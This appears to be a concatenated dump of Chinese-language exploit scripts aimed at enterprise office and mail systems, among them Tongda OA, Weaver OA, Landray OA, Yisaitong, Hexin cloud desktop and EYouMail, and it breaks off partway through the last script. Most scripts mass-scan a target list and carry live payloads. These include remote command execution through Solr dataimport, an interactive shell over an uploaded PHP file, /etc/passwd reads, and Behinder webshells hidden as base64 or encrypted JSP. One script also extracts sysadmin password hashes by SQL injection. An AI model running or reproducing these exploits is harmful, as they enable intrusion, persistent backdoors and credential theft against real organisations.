AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1", 24 | "MQQBrowser/26 Mozilla/5.0 (Linux; U; Android 2.3.7; zh-cn; MB200 Build/GRJ22; CyanogenMod-7) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1", 25 | "Opera/9.80 (Android 2.3.4; Linux; Opera Mobi/build-1107180945; U; en-GB) Presto/2.8.149 Version/11.10", 26 | "Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13", 27 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1+ (KHTML, like Gecko) Version/6.0.0.337 Mobile Safari/534.1+", 28 | "Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.0; U; en-US) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/233.70 Safari/534.6 TouchPad/1.0", 29 | "Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/20.0.019; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko) BrowserNG/7.1.18124", 30 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; HTC; Titan)", 31 | ] 32 | 33 | headers = { 34 | "User-Agent" : random.choice(USER_AGENTS), 35 | "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", 36 | "Accept-Language" : "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", 37 | "Accept-Encoding" : "gzip, deflate", 38 | "Connection" : "close", 39 | "Upgrade-Insecure-Requests" : "1" 40 | } 41 | session = requests.session() 42 | res = open("url.txt","r") #url.txt 存放探目标的文件 43 | for ip in res.readlines(): 44 | url = ip.strip()+"/admin/login.html?s=admin/api.Update/get/encode/1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s" 45 | if url[:4] != "http": 46 | url = "http://" + url 47 | try: 48 | req = session.get(url=url, headers=headers, verify=False, timeout=5) 49 | if req.status_code == 200: 50 | print("\033[32m[+] 正在请求{}".format(url)) 51 | else: 52 | url = url.replace("http","https") 53 | req = session.get(url=url, headers=headers, verify=False, timeout=5) 54 | if req.status_code == 200: 55 | print("\033[32m[+] 正在请求{}".format(url)) 56 | else: 57 | pass 58 | except: 59 | pass 60 | 61 | 62 | 63 | try: 64 | request = session.get(url=url, headers=headers, verify=False, timeout=5) 65 | try: 66 | rep = base64.b64decode(json.loads(request.text)['data']['content']) 67 | if "root" in str(rep): 68 | with open('success.txt', 'a', encoding='utf8') as vul: 69 | vul.write(url+'\n') 70 | print("\033[32m[o]"+url+"\n"+"存在任意文件读取漏洞") 71 | else: 72 | pass 73 | except: 74 | pass 75 | except: 76 | pass 77 | 78 | -------------------------------------------------------------------------------- /亿赛通/电子文档安全管理系统_dataimport_远程命令执行漏洞.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import random 4 | import re 5 | import base64 6 | import time 7 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 8 | 9 | def title(): 10 | print('+------------------------------------------') 11 | print('+ \033[34mTitle : 亿赛通 电子文档安全管理系统 dataimport 远程命令执行漏洞 \033[0m') 12 | print('+ \033[36m使用格式: python3 poc.py \033[0m') 13 | print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m') 14 | print('+------------------------------------------') 15 | 16 | def POC_1(target_url): 17 | vuln_url = target_url + "/solr/admin/cores" 18 | headers = { 19 | "Content-Type": "application/x-www-form-urlencoded", 20 | } 21 | try: 22 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 23 | response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) 24 | print("\033[36m[o] 正在请求 {}/solr/admin/cores.... \033[0m".format(target_url)) 25 | if 'responseHeader' in response.text and response.status_code == 200: 26 | result = re.search( 27 | r'<str name="name">([\s\S]*?)</str><str name="instanceDir">', response.text, re.I) 28 | core_name = result.group(1) 29 | print("\033[36m[o] 获取core_name : {} \033[0m".format(core_name)) 30 | POC_2(target_url, core_name) 31 | else: 32 | print("\033[31m[x] 请求失败 \033[0m") 33 | sys.exit(0) 34 | 35 | except Exception as e: 36 | print("\033[31m[x] 请求失败 \033[0m", e) 37 | 38 | def POC_2(target_url, core_name): 39 | cmd = "whoami" 40 | vuln_url = target_url + "/solr/{}/dataimport?command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig=%0A%3CdataConfig%3E%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22TRACE%22%20%2F%3E%0A%0A%20%20%3Cscript%3E%3C!%5BCDATA%5B%0A%20%20%20%20%20%20%20%20%20%20function%20poc(row)%7B%0A%20var%20bufReader%20%3D%20new%20java.io.BufferedReader(new%20java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(%22{}%22).getInputStream()))%3B%0A%0Avar%20result%20%3D%20%5B%5D%3B%0A%0Awhile(true)%20%7B%0Avar%20oneline%20%3D%20bufReader.readLine()%3B%0Aresult.push(%20oneline%20)%3B%0Aif(!oneline)%20break%3B%0A%7D%0A%0Arow.put(%22title%22%2Cresult.join(%22%5Cn%5Cr%22))%3B%0Areturn%20row%3B%0A%0A%7D%0A%0A%5D%5D%3E%3C%2Fscript%3E%0A%0A%3Cdocument%3E%0A%20%20%20%20%3Centity%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0A%20%20%20%20%20%20%20%20name%3D%22entity1%22%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0A%20%20%20%20%20%20%20%20forEach%3D%22%2FRDF%2Fitem%22%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Apoc%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cfield%20column%3D%22title%22%20xpath%3D%22%2FRDF%2Fitem%2Ftitle%22%20%2F%3E%0A%20%20%20%20%3C%2Fentity%3E%0A%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E%0A%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20".format(core_name, cmd) 41 | files = { 42 | 'stream.body': '''<?xml version="1.0" encoding="UTF-8"?> 43 | <RDF> 44 | <item/> 45 | </RDF>''' 46 | } 47 | try: 48 | print("\033[36m[o] 正在执行 whoami ... \033[0m".format(target_url)) 49 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 50 | response = requests.post(url=vuln_url, files=files, verify=False, timeout=5) 51 | cmd_response = re.search( 52 | r'documents"><lst><arr name="title"><str>([\s\S]*?)</str></arr></lst>', response.text, re.I) 53 | cmd_response = cmd_response.group(1) 54 | if response.status_code == 200 and cmd_response: 55 | print("\033[36m[o] 命令响应为:\n{} \033[0m".format(cmd_response)) 56 | 57 | except Exception as e: 58 | print("\033[31m[x] 请求失败 \033[0m") 59 | 60 | 61 | 62 | if __name__ == '__main__': 63 | title() 64 | target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m")) 65 | POC_1(target_url) 66 | -------------------------------------------------------------------------------- /tongdaOA/通达OA命令执行漏洞/tongda_rce.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- encoding: utf-8 -*- 3 | ''' 4 | @File : tongda_rce.py 5 | @Time : 2020/03/18 11:59:48 6 | @Author : fuhei 7 | @Version : 1.0 8 | @Blog : http://www.lovei.org 9 | ''' 10 | 11 | import requests 12 | import re 13 | import sys 14 | 15 | 16 | def check(url): 17 | 18 | try: 19 | url1 = url + '/ispirit/im/upload.php' 20 | headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Forwarded-For": "127.0.0.1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "multipart/form-data; boundary=---------------------------27723940316706158781839860668"} 21 | data = "-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"ATTACHMENT\"; filename=\"f.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php\r\n$command=$_POST['f'];\r\n$wsh = new COM('WScript.shell');\r\n$exec = $wsh->exec(\"cmd /c \".$command);\r\n$stdout = $exec->StdOut();\r\n$stroutput = $stdout->ReadAll();\r\necho $stroutput;\r\n?>\n\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"P\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"DEST_UID\"\r\n\r\n1222222\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"UPLOAD_MODE\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668--\r\n" 22 | result = requests.post(url1, headers=headers, data=data) 23 | 24 | name = "".join(re.findall("2003_(.+?)\|",result.text)) 25 | url2 = url + '/ispirit/interface/gateway.php' 26 | headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Forwarded-For": "127.0.0.1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded"} 27 | data = {"json": "{\"url\":\"../../../general/../attach/im/2003/%s.f.jpg\"}" % (name), "f": "echo fffhhh"} 28 | result = requests.post(url2, headers=headers, data=data) 29 | if result.status_code == 200 and 'fffhhh' in result.text: 30 | # print("[+] Remote code execution vulnerability exists at the target address") 31 | return name 32 | else: 33 | return False 34 | except: 35 | pass 36 | 37 | def command(url, name,command="whoami"): 38 | url = url + '/ispirit/interface/gateway.php' 39 | headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Forwarded-For": "127.0.0.1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded"} 40 | data = {"json": "{\"url\":\"../../../general/../attach/im/2003/%s.f.jpg\"}" % (name), "f": "%s" % command} 41 | result = requests.post(url, headers=headers, data=data) 42 | while(1): 43 | command = input("fuhei@shell$ ") 44 | if command == 'exit' or command == 'quit': 45 | break 46 | else: 47 | data = {"json": "{\"url\":\"../../../general/../attach/im/2003/%s.f.jpg\"}" % (name), "f": "%s" % command} 48 | result = requests.post(url, headers=headers, data=data) 49 | print(result.text) 50 | 51 | if __name__ == '__main__': 52 | url = sys.argv[1] 53 | name = check(url) 54 | if name: 55 | print("[+] Remote code execution vulnerability exists at the target address") 56 | command(url,name) 57 | else: 58 | print("[-] There is no remote code execution vulnerability in the target address") 59 | 60 | 61 | -------------------------------------------------------------------------------- /蓝凌OA/蓝凌OA_custom.jsp 任意文件读取漏洞/poc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | #-*- coding:utf-8 -*- 3 | 4 | import base64 5 | import requests 6 | import random 7 | import re 8 | import json 9 | import sys 10 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 11 | 12 | def title(): 13 | print('+------------------------------------------') 14 | print('+ \033[34mVersion: 蓝凌OA 任意文件读取漏洞 \033[0m') 15 | print('+ \033[36m使用格式: python3 poc.py \033[0m') 16 | print('+ \033[36m文件名: url.txt \033[0m') 17 | print('+------------------------------------------') 18 | 19 | def get_ua(): 20 | first_num = random.randint(55, 62) 21 | third_num = random.randint(0, 3200) 22 | fourth_num = random.randint(0, 140) 23 | os_type = [ 24 | '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', 25 | '(Macintosh; Intel Mac OS X 10_12_6)' 26 | ] 27 | chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num) 28 | 29 | ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', 30 | '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] 31 | ) 32 | return ua 33 | 34 | 35 | def POC_1(target_url): 36 | vuln_url = target_url + "/sys/ui/extend/varkind/custom.jsp" 37 | headers = { 38 | "User-Agent": get_ua(), 39 | "Content-Type": "application/x-www-form-urlencoded" 40 | } 41 | data = 'var={"body":{"file":"file:///etc/passwd"}}' 42 | try: 43 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 44 | response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10) 45 | print("\033[36m[+] 正在请求 {}/sys/ui/extend/varkind/custom.jsp \033[0m".format(target_url)) 46 | if "root:" in response.text and response.status_code == 200: 47 | with open('success.txt', 'a', encoding='utf8') as vul: 48 | vul.write("{}\n".format(target_url)) 49 | print("\033[36m[+] 成功读取 /etc/passwd文件\n\033[0m") 50 | except Exception as e: 51 | print("\033[31m[x] 请求失败: {} \033[0m".format(e)) 52 | 53 | def Scan(file_name): 54 | header={"User-Agent": get_ua(),} 55 | with open(file_name, "r", encoding='utf8') as scan_url: 56 | for url in scan_url: 57 | if url[:4] != "http": 58 | url = "http://" + url 59 | url = url.strip('\n') 60 | try: 61 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 62 | httpError = False 63 | try: 64 | req = requests.get(url=url, headers=header, verify=False, timeout=10) 65 | except Exception as e: 66 | httpError = True 67 | if not httpError and req.status_code == 200: 68 | print("\033[32m[+] 正在请求 {}".format(url)) 69 | else: 70 | url = url.replace("http","https") 71 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 72 | req = requests.get(url=url, headers=header, verify=False, timeout=10) 73 | if req.status_code == 200: 74 | print("\033[32m[+] 正在请求 {}".format(url)) 75 | else: 76 | pass 77 | except Exception as e: 78 | print("\033[31m[x] "+url+" 访问失败 \033[0m".format(e)) 79 | else: 80 | pass 81 | try: 82 | POC_1(url) 83 | 84 | except Exception as e: 85 | print("\033[31m[x] "+url+"请求报错 \033[0m".format(e)) 86 | continue 87 | 88 | 89 | if __name__ == '__main__': 90 | title() 91 | file_name = str(input("\033[35m请输入需要检测的文件名:\033[0m")) 92 | Scan(file_name) 93 | 94 | -------------------------------------------------------------------------------- /和信创天云桌面系统/poc.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import random 4 | import base64 5 | import re 6 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 7 | 8 | def title(): 9 | print('+------------------------------------------') 10 | print('+ \033[34mVersion: 和信云桌面任意文件上传漏洞 \033[0m') 11 | print('+ \033[36m使用格式: python3 poc.py \033[0m') 12 | print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m') 13 | print('+ \033[36mFile >>> url.txt \033[0m') 14 | print('+------------------------------------------') 15 | 16 | headers = { 17 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)", 18 | "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv" 19 | } 20 | 21 | def POC_1(target_url): 22 | vuln_url = target_url + "/Upload/upload_file.php?l=test" 23 | data = base64.b64decode("Q29udGVudC1UeXBlOiBtdWx0aXBhcnQvZm9ybS1kYXRhOyBib3VuZGFyeT0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5ZmNLUmx0R3YKCi0tLS0tLVdlYktpdEZvcm1Cb3VuZGFyeWZjS1JsdEd2CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZmlsZSI7IGZpbGVuYW1lPSJjb25maWcucGhwIgpDb250ZW50LVR5cGU6IGltYWdlL2F2aWYKCjw/cGhwCkBlcnJvcl9yZXBvcnRpbmcoMCk7CnNlc3Npb25fc3RhcnQoKTsKCWVjaG8gIm5vX3NoZWxsIjsKICAgICRrZXk9ImU0NWUzMjlmZWI1ZDkyNWIiOwoJJF9TRVNTSU9OWydrJ109JGtleTsKCSRwb3N0PWZpbGVfZ2V0X2NvbnRlbnRzKCJwaHA6Ly9pbnB1dCIpOwoJaWYoIWV4dGVuc2lvbl9sb2FkZWQoJ29wZW5zc2wnKSkKCXsKCQkkdD0iYmFzZTY0XyIuImRlY29kZSI7CgkJJHBvc3Q9JHQoJHBvc3QuIiIpOwoJCQoJCWZvcigkaT0wOyRpPHN0cmxlbigkcG9zdCk7JGkrKykgewogICAgCQkJICRwb3N0WyRpXSA9ICRwb3N0WyRpXV4ka2V5WyRpKzEmMTVdOyAKICAgIAkJCX0KCX0KCWVsc2UKCXsKCQkkcG9zdD1vcGVuc3NsX2RlY3J5cHQoJHBvc3QsICJBRVMxMjgiLCAka2V5KTsKCX0KICAgICRhcnI9ZXhwbG9kZSgnfCcsJHBvc3QpOwogICAgJGZ1bmM9JGFyclswXTsKICAgICRwYXJhbXM9JGFyclsxXTsKCWNsYXNzIEN7cHVibGljIGZ1bmN0aW9uIF9faW52b2tlKCRwKSB7ZXZhbCgkcC4iIik7fX0KICAgIEBjYWxsX3VzZXJfZnVuYyhuZXcgQygpLCRwYXJhbXMpOwo/PgoKLS0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5ZmNLUmx0R3YtLQ==") 24 | try: 25 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 26 | response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5) 27 | if "Requst" in response.text and response.status_code == 200: 28 | webshell_url = target_url + "/Upload/test/config.php" 29 | response = requests.get(url=webshell_url, headers=headers,verify=False, timeout=5) 30 | if "shell" in response.text and response.status_code == 200: 31 | with open('webshell.txt', 'a', encoding='utf8') as vu: 32 | vu.write("目标 {} 被上传木马: {}/Upload/test/config.php\n".format(target_url, target_url)) 33 | print("\033[32m[o] 目标 {}存在漏洞 ,成功上传冰蝎木马 config.php\n[o] 路径为 {}/Upload/test/config.php\033[0m".format(target_url, target_url)) 34 | print("\033[32m[o] 密码为: rebeyond \033[0m") 35 | else: 36 | print("\033[31m[x]"+ target_url+"请求失败 \033[0m") 37 | else: 38 | pass 39 | except Exception as e: 40 | pass 41 | 42 | 43 | def Scan(file_name): 44 | with open(file_name, "r", encoding='utf8') as scan_url: 45 | for url in scan_url: 46 | if url[:4] != "http": 47 | url = "http://" + url 48 | url = url.strip('\n') 49 | try: 50 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 51 | req = requests.get(url=url, headers=headers, verify=False, timeout=5) 52 | if req.status_code == 200: 53 | print("\033[32m[o] 正在请求{}".format(url)) 54 | else: 55 | url = url.replace("http","https") 56 | req = requests.get(url=url, headers=headers, verify=False, timeout=5) 57 | if req.status_code == 200: 58 | print("\033[32m[o] 正在请求{}".format(url)) 59 | else: 60 | pass 61 | except Exception as e: 62 | print("\033[31m[x] "+url+"访问失败 \033[0m".format(e)) 63 | try: 64 | POC_1(url) 65 | 66 | except Exception as e: 67 | print("\033[31m[x] "+url+"请求报错 \033[0m".format(e)) 68 | continue 69 | 70 | if __name__ == '__main__': 71 | title() 72 | file_name = str(input("\033[35mPlease input Attack File\nFile >>> \033[0m")) 73 | Scan(file_name) 74 | -------------------------------------------------------------------------------- /泛微OA/泛微OA_V9_任意文件上传/泛微OA_sql+upload.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib3 3 | import time 4 | import argparse 5 | 6 | parser = argparse.ArgumentParser(description="请输入目标地址") 7 | parser.add_argument('-u',type=str,help='请输入url',dest='url',default='') 8 | parser.add_argument('-f',type=str,help='请插入字典',dest='file',default='') 9 | args = parser.parse_args() 10 | Get_url = args.url 11 | Get_file = args.file 12 | 13 | def title(): 14 | print("*"*50) 15 | print("*"*4+" "*12+"泛微OA v9 前台文件上传"+" "*8+"*"*4) 16 | print("*"*4+" "*12+"泛微OA v8 前台sql注入"+" "*9+"*"*4) 17 | print("*"*4+" "*33+"By 瓜皮辰"+"*"*4) 18 | print("*"*4+" "*2+"单目标示例:python FanWpoc.py -u url"+" "*4+"*"*4) 19 | print("*"*4+" "*2+"多目标示例:python FanWpoc.py -f *.txt"+" "*2+"*"*4) 20 | print("*"*50) 21 | 22 | def poc1(get_url): 23 | test_url1 = get_url + "/page/exportImport/uploadOperation.jsp" 24 | sql_url = get_url + "/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager" 25 | header = { 26 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36" 27 | } 28 | try: 29 | urllib3.disable_warnings() 30 | res_test = requests.get(url=test_url1,headers=header,verify=False,timeout=5) 31 | if res_test.status_code == 200: 32 | print(get_url+" "+"目标文件上传页面存在,正在测试文件上传,请等待") 33 | time.sleep(1) 34 | poc2(get_url) 35 | else: 36 | print(get_url+" "+"目标文件上传页面不存在,更换地址。") 37 | res_sql = requests.get(url=sql_url,headers=header,verify=False,timeout=5) 38 | if res_sql.status_code == 200 and '</html>' not in res_sql.text: 39 | md5pass = str.strip(res_sql.text) 40 | print("目标存在sql注入漏洞") 41 | vuln_sql = get_url+" 用户名:sysadmin md5密码:"+md5pass 42 | print(vuln_sql) 43 | print("--------------------------") 44 | with open('sql.txt','a+',encoding="utf-8") as s: 45 | s.write(vuln_sql+'\n') 46 | else: 47 | print(get_url+" "+"目标不存在sql注入漏洞") 48 | 49 | except Exception as e: 50 | print(get_url+" "+"目标请求失败!",e) 51 | 52 | def poc2(get_url): 53 | test_url2 = get_url + "/page/exportImport/uploadOperation.jsp" 54 | header = { 55 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36", 56 | "Connection": "close", 57 | "Content-Length": "500" 58 | } 59 | files = { 60 | 'file': ('guapi.jsp',"<%out.print(666);%>",'application/octet-stream') 61 | } 62 | try: 63 | res_1 = requests.post(url=test_url2,headers=header,files=files,verify=False,timeout=5) 64 | poc3(get_url) 65 | except Exception as c: 66 | print("文件上传出错!",c) 67 | 68 | def poc3(get_url): 69 | test_url3 = get_url + '/page/exportImport/fileTransfer/guapi.jsp' 70 | header = { 71 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36", 72 | "Connection": "close", 73 | "Content-Length": "500" 74 | } 75 | res_2 = requests.get(url=test_url3, headers=header, verify=False, timeout=5) 76 | if '666' in res_2.text and res_2.status_code == 200: 77 | print("文件上传成功!!!!!") 78 | vuln_file = get_url+'/page/exportImport/fileTransfer/guapi.jsp' 79 | print("请访问地址:"+vuln_file) 80 | with open('file.txt','a+',encoding='utf-8') as file: 81 | file.write(vuln_file+'\n') 82 | else: 83 | print("上传失败,目标不存在文件上传漏洞") 84 | print("--------------------------") 85 | 86 | def poc4(): 87 | with open(args.file,'r+',encoding='utf-8') as f: 88 | for i in f.readlines(): 89 | s = i.strip() 90 | if 'http://' in s: 91 | poc1(s) 92 | else: 93 | exp1 = 'http://'+s 94 | poc1(exp1) 95 | f.close() 96 | if __name__ == '__main__': 97 | title() 98 | try: 99 | if Get_url != '' and Get_file == '': 100 | if 'http://' in Get_url: 101 | poc1(Get_url) 102 | else: 103 | exp2 = 'http://'+Get_url 104 | poc1(exp2) 105 | elif Get_url == '' and Get_file != '': 106 | poc4() 107 | except KeyboardInterrupt: 108 | print("结束进程。。。。") 109 | pass 110 | -------------------------------------------------------------------------------- /泛微OA/泛微OA_V9_任意文件上传/poc.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import random 4 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 5 | 6 | def title(): 7 | print('+------------------------------------------') 8 | print('+ \033[34mVersion: 泛微OA V9 任意文件上传 \033[0m') 9 | print('+ \033[36m使用格式: python3 poc.py \033[0m') 10 | print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m') 11 | print('+ \033[36mFile >>> url.txt \033[0m') 12 | print('+------------------------------------------') 13 | 14 | #随机ua 15 | def get_ua(): 16 | first_num = random.randint(55, 62) 17 | third_num = random.randint(0, 3200) 18 | fourth_num = random.randint(0, 140) 19 | os_type = [ 20 | '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', 21 | '(Macintosh; Intel Mac OS X 10_12_6)' 22 | ] 23 | chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num) 24 | 25 | ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', 26 | '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] 27 | ) 28 | return ua 29 | 30 | 31 | 32 | def POC_1(target_url): 33 | vuln_url_1 = target_url + "/page/exportImport/uploadOperation.jsp" 34 | print('\033[36m[+] 正在请求: {}'.format(vuln_url_1)) 35 | headers = { 36 | "User-Agent": get_ua(), 37 | "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary6XgyjB6SeCArD3Hc", 38 | "Connection": "close", 39 | "Content-Length": "500" 40 | } 41 | files = { 42 | 'file': ('update.jsp','<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%><%out.print(666);%>','application/octet-stream') 43 | } 44 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 45 | response = requests.post(url=vuln_url_1, headers=headers, timeout=5, files=files, verify=False) 46 | webshell_url = target_url + "/page/exportImport/fileTransfer/update.jsp" 47 | try: 48 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 49 | response = requests.get(url=webshell_url, timeout=5, verify=False, headers=headers) 50 | if '666' in response.text and response.status_code == 200: 51 | with open('webshell.txt', 'a', encoding='utf8') as vu: 52 | vu.write("目标 {} 被上传木马: {}/page/exportImport/fileTransfer/update.jsp\n".format(target_url, target_url)) 53 | print("\033[32m[+] 目标 {} 被上传木马: {}/page/exportImport/fileTransfer/update.jsp \033[0m".format(target_url, target_url)) 54 | except Exception as e: 55 | print("\033[31m[x] "+url+" 请求报错 \033[0m".format(e)) 56 | 57 | def Scan(file_name): 58 | header={"User-Agent": get_ua(),} 59 | with open(file_name, "r", encoding='utf8') as scan_url: 60 | for url in scan_url: 61 | if url[:4] != "http": 62 | url = "http://" + url 63 | url = url.strip('\n') 64 | try: 65 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 66 | httpError = False 67 | try: 68 | req = requests.get(url=url, headers=header, verify=False, timeout=5) 69 | except Exception as e: 70 | httpError = True 71 | if not httpError and req.status_code == 200: 72 | print("\033[32m[+] 正在请求{}".format(url)) 73 | else: 74 | url = url.replace("http","https") 75 | req = requests.get(url=url, headers=header, verify=False, timeout=5) 76 | if req.status_code == 200: 77 | print("\033[32m[+] 正在请求{}".format(url)) 78 | else: 79 | pass 80 | except Exception as e: 81 | print("\033[31m[x] "+url+" 访问失败 \033[0m".format(e)) 82 | try: 83 | POC_1(url) 84 | 85 | except Exception as e: 86 | print("\033[31m[x] "+url+" 请求报错 \033[0m".format(e)) 87 | continue 88 | if __name__ == '__main__': 89 | title() 90 | file_name = str(input("\033[35m请输入需要检测的文件名:\033[0m")) 91 | Scan(file_name) 92 | -------------------------------------------------------------------------------- /EYouMail/EYouMailRCE.py: -------------------------------------------------------------------------------- 1 | import re 2 | import requests,sys,random,re,json,click,base64 3 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 4 | 5 | def info(): 6 | print("[+]============================================================") 7 | print("[+] 亿邮电子邮件系统远程命令执行漏洞") 8 | print("[+] Explain: wendengyun") 9 | print("[+]============================================================") 10 | print(" ") 11 | 12 | #随机ua 13 | def get_ua(): 14 | first_num = random.randint(55, 62) 15 | third_num = random.randint(0, 3200) 16 | fourth_num = random.randint(0, 140) 17 | os_type = [ 18 | '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', 19 | '(Macintosh; Intel Mac OS X 10_12_6)' 20 | ] 21 | chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num) 22 | 23 | ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', 24 | '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] 25 | ) 26 | return ua 27 | 28 | 29 | # 漏洞利用poc 30 | def exp1(url): 31 | target_url = url + "/webadm/?q=moni_detail.do&action=gragh" 32 | headers = { 33 | "User-Agent": get_ua(), 34 | "Content-Type": "application/x-www-form-urlencoded;charset=UTF-8", 35 | "Accept-Encoding": "gzip, deflate", 36 | "Accept-Language": "zh-CN,zh;q=0.9", 37 | "Connection": "close", 38 | } 39 